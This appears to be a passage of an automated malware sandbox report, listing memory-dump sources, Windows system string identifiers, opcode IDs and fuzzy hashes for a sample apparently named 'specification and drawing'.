                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Legacy$UEFI
                                                                                                          • API String ID: 2994545307-634100481
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$MUI
                                                                                                          • API String ID: 0-17815947
                                                                                                          Strings
                                                                                                          • kLsE, xrefs: 010C0540
                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                          • API String ID: 0-2547482624
                                                                                                          Strings
                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                          • API String ID: 0-2876891731
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: MUI
                                                                                                          • API String ID: 0-1339004836
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GlobalTags
                                                                                                          • API String ID: 0-1106856819
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .mui
                                                                                                          • API String ID: 0-1199573805
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EXT-
                                                                                                          • API String ID: 0-1948896318
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AlternateCodePage
                                                                                                          • API String ID: 0-3889302423
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryHash
                                                                                                          • API String ID: 0-2202222882
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #
                                                                                                          • API String ID: 0-1885708031
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryName
                                                                                                          • API String ID: 0-215506332
                                                                                                          Strings
                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                          • API String ID: 0-702105204
                                                                                                          • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                                                                          • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                                                                          • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                                                                                          • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                                                                          • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                                                                          • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                                                                                          • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                                                                          • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                                                                          • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                                                                                          • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                                                                          • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                                                                          • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                                                                                          • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                                                                          • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                                                                          • Instruction ID: d629e23cc64e27d53bdac26cd6e51290cb729a69df65a258fd9e02f6a5c3d851
                                                                                                          • Opcode Fuzzy Hash: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                                                                                          • Instruction Fuzzy Hash: 3F818071A0061A9BDB18CF69C890ABEFBF9FB48700F04853EE445E7644E775D940CBA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                          • Instruction ID: 10d9f50a63a619b633fcce28ac6d58aea7ce1fc74b35558e9f9a55ab4477cf62
                                                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                          • Instruction Fuzzy Hash: F6817E71A002099FDF1DDF98D890AAEBBB6BF84310F19C56AD9169B384D774E902CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                                                                          • Instruction ID: 8e472d2edff610e9261b3a0be93d46b891ab863e7e752f2ae1707e64d5e35fcd
                                                                                                          • Opcode Fuzzy Hash: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                                                                                          • Instruction Fuzzy Hash: EE71B371A0470A9BEB2DCF19C8A0B6EF7E4BB44358F054939E9A5C7204E730E944CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                                                                                          • Instruction ID: be3bb92d476ea1ba8dd9d629d226af213469963ef3a84409e62ac27f12053f3b
                                                                                                          • Opcode Fuzzy Hash: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                                                                                          • Instruction Fuzzy Hash: 47818F71A00609AFDB25CFA9C884BEEBBF9FF88314F11842DE695A7650D770AC45CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                                                                                          • Instruction ID: eb23cb548d03bddac4250aeabb6f82c57025d8e897a2b3edae7cef36ed805bc1
                                                                                                          • Opcode Fuzzy Hash: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                                                                                          • Instruction Fuzzy Hash: AA71DA75C002299FDB298F58D9907BEBBF0FF58710F15412AE992AB350E7309854CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                                                                                          • Instruction ID: 5bcc1ecea56bf4c49b668ca9913abaa13b67b58e98aed63a2a06c9161b866124
                                                                                                          • Opcode Fuzzy Hash: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                                                                                          • Instruction Fuzzy Hash: 9071BF70904266DFCB59DF5AC840ABABBF1EF89304F048069EDA4DB241E335EA45C7A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5d2f23243f966b93db5d462cb30ab9083fce1d7eda9a457a6068c79ed567c8d2
                                                                                                          • Instruction ID: fcfc55a54d46c3fe4a8904648ed2b31920a13670685f4f3721d1861bf7b6a7c6
                                                                                                          • Opcode Fuzzy Hash: 5d2f23243f966b93db5d462cb30ab9083fce1d7eda9a457a6068c79ed567c8d2
                                                                                                          • Instruction Fuzzy Hash: 4571D0356047428FD326DF28C480B6AB7E5FF88310F0585AAE8D9CB352DB34D846CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                          • Instruction ID: e69c4ed0a3f04f38747073b7aafdfb0a118f32ed7eb82d382954aa9aabc8ae11
                                                                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                          • Instruction Fuzzy Hash: 48717D71E0060AAFDB14DFA9C984EDEBBB8FF48704F104569E645AB250DB30EA41CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                                                                                          • Instruction ID: ffaf9ce4a43dcd9eb0b81667a84ed99c9d95a02baed6557fecd04ef0a6e381c0
                                                                                                          • Opcode Fuzzy Hash: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                                                                                          • Instruction Fuzzy Hash: FB71F232200B01EFE77A9F18C844F5ABBB6EF44724F554528EA658B2E1D774E944CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                                                                                          • Instruction ID: 03d756881e53b8a67aff7243f01952d4ed611a7fa9e24e165c4729ed0c9bf159
                                                                                                          • Opcode Fuzzy Hash: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                                                                                          • Instruction Fuzzy Hash: FE81BD72A083268FDB28CF9CC4C4BAEB7B1BB49710F15812ED901AB282C7759D50CF94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                                                                                          • Instruction ID: 6ecce2a88fd3306672e8de36dbe70a96f44d2138d829c4186640a036998a085b
                                                                                                          • Opcode Fuzzy Hash: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                                                                                          • Instruction Fuzzy Hash: 1361C071A0020ADFDB1DDF68C982AAEB7B5FF48314F14466DE652EB295DB309902CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                                                                                          • Instruction ID: 81fb24b04c1a7ebb2b8a23fdf09f5a43aceb440fc82f7610c3321c08437b1e26
                                                                                                          • Opcode Fuzzy Hash: d996a9f5857ef4ae4af5291bbade1176f2694ee18ecbd4390b8dc1ae9648bf16
                                                                                                          • Instruction Fuzzy Hash: 0741DD32A01215CFDF29DF6DC898BED7BF0BF58320F1441A9D462AB291DB349940CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                                                                                          • Instruction ID: 77d19fb7ce20f3fa081d3b05d7ed894be53fa12b0d8b4fdf1626e6f7dc1bfe6a
                                                                                                          • Opcode Fuzzy Hash: 87d8d9be69360adb27f4d5829c21e0be2ea372295e016a266c44fa14931b206d
                                                                                                          • Instruction Fuzzy Hash: DA41F332900216CBDB289F4CC8C0A9EBBB1FB98B14F14C02ED9129B656D735D842CF94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                                                                                          • Instruction ID: 06a0770a64bab20386d1d48d860dd9875819ce4c35f161b4d4bb559e7bdb102e
                                                                                                          • Opcode Fuzzy Hash: 954b2627fe524da4bd94dd61167845b013d155df75ac1a26d2d4a9d7e3435f41
                                                                                                          • Instruction Fuzzy Hash: E9416A315087069ED712DF69C880AABF7E8EF88B54F44492BF980D7260E731DE048B97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                          • Instruction ID: ac2013c91da1b622c8b36a5147c8ad37fbb83613b76fb5983b7c3ea6ed1a6221
                                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                          • Instruction Fuzzy Hash: 9D412931B08213DBDB29DE5884807FEFB71EB50764F15807AF9858B244E7368D80CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                                                                                          • Instruction ID: 525b7b4b905876c0ed4a6d9bdd99b11f28c43d3236a71c4c9ea6a2d58d505d36
                                                                                                          • Opcode Fuzzy Hash: 6bcadebd5c0b960ecf374cf0a99e889e30667adc01172adeb74adfbe8edd88cd
                                                                                                          • Instruction Fuzzy Hash: BA415475600701EFD725CF18C840B6ABBE4EF58B14F248A6EE8898B255E771E942CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                          • Instruction ID: e5ac39a8cde0b61f2643facbc2f3d86d3becced98c273eb70d7aba7d4e068181
                                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                          • Instruction Fuzzy Hash: 6A415C75A00705EFDB24CF98C981AAABBF5FF08700B1049ADE696D7656D330EA44CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                                                                                          • Instruction ID: cb40cd13c0cbd32f133ccfa3ebfd27bea502d146ecb06816d10bdd8bdd564da1
                                                                                                          • Opcode Fuzzy Hash: 9601e192888acbcb38ff0c42d541551b5cb17f2813c085c78002e3099e5623e5
                                                                                                          • Instruction Fuzzy Hash: 7C41BFB1501705CFC72AEF28C980AADB7F1FF58B14F1482ADC4969BAA1DB309941CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                                                                                          • Instruction ID: 5d604c50908903ed0199f10982337347f9e9f449fa7cb49e9b8baed40e9c4937
                                                                                                          • Opcode Fuzzy Hash: 5fde310f05c510ee84d7e8d2daf702d7755ccdc41bb69ad2e465b0a88ffdf840
                                                                                                          • Instruction Fuzzy Hash: D031BCB2A04349DFEB16CF58C141B99BBF0FB08718F2085AED119EB651D3329902CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                                                                                          • Instruction ID: 92ed2f6473372243d7280c8f6fb11a20b07f1284a14c9a2851c33b86e266ba07
                                                                                                          • Opcode Fuzzy Hash: ec013ff44fab63a9993d5a092fe1f81803f95472f646303c6c3a8c8b830d0443
                                                                                                          • Instruction Fuzzy Hash: 35418E719083019FD764DF29C885B9BBBE8FF88654F004A2EF6A8D7291D7709944CB92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
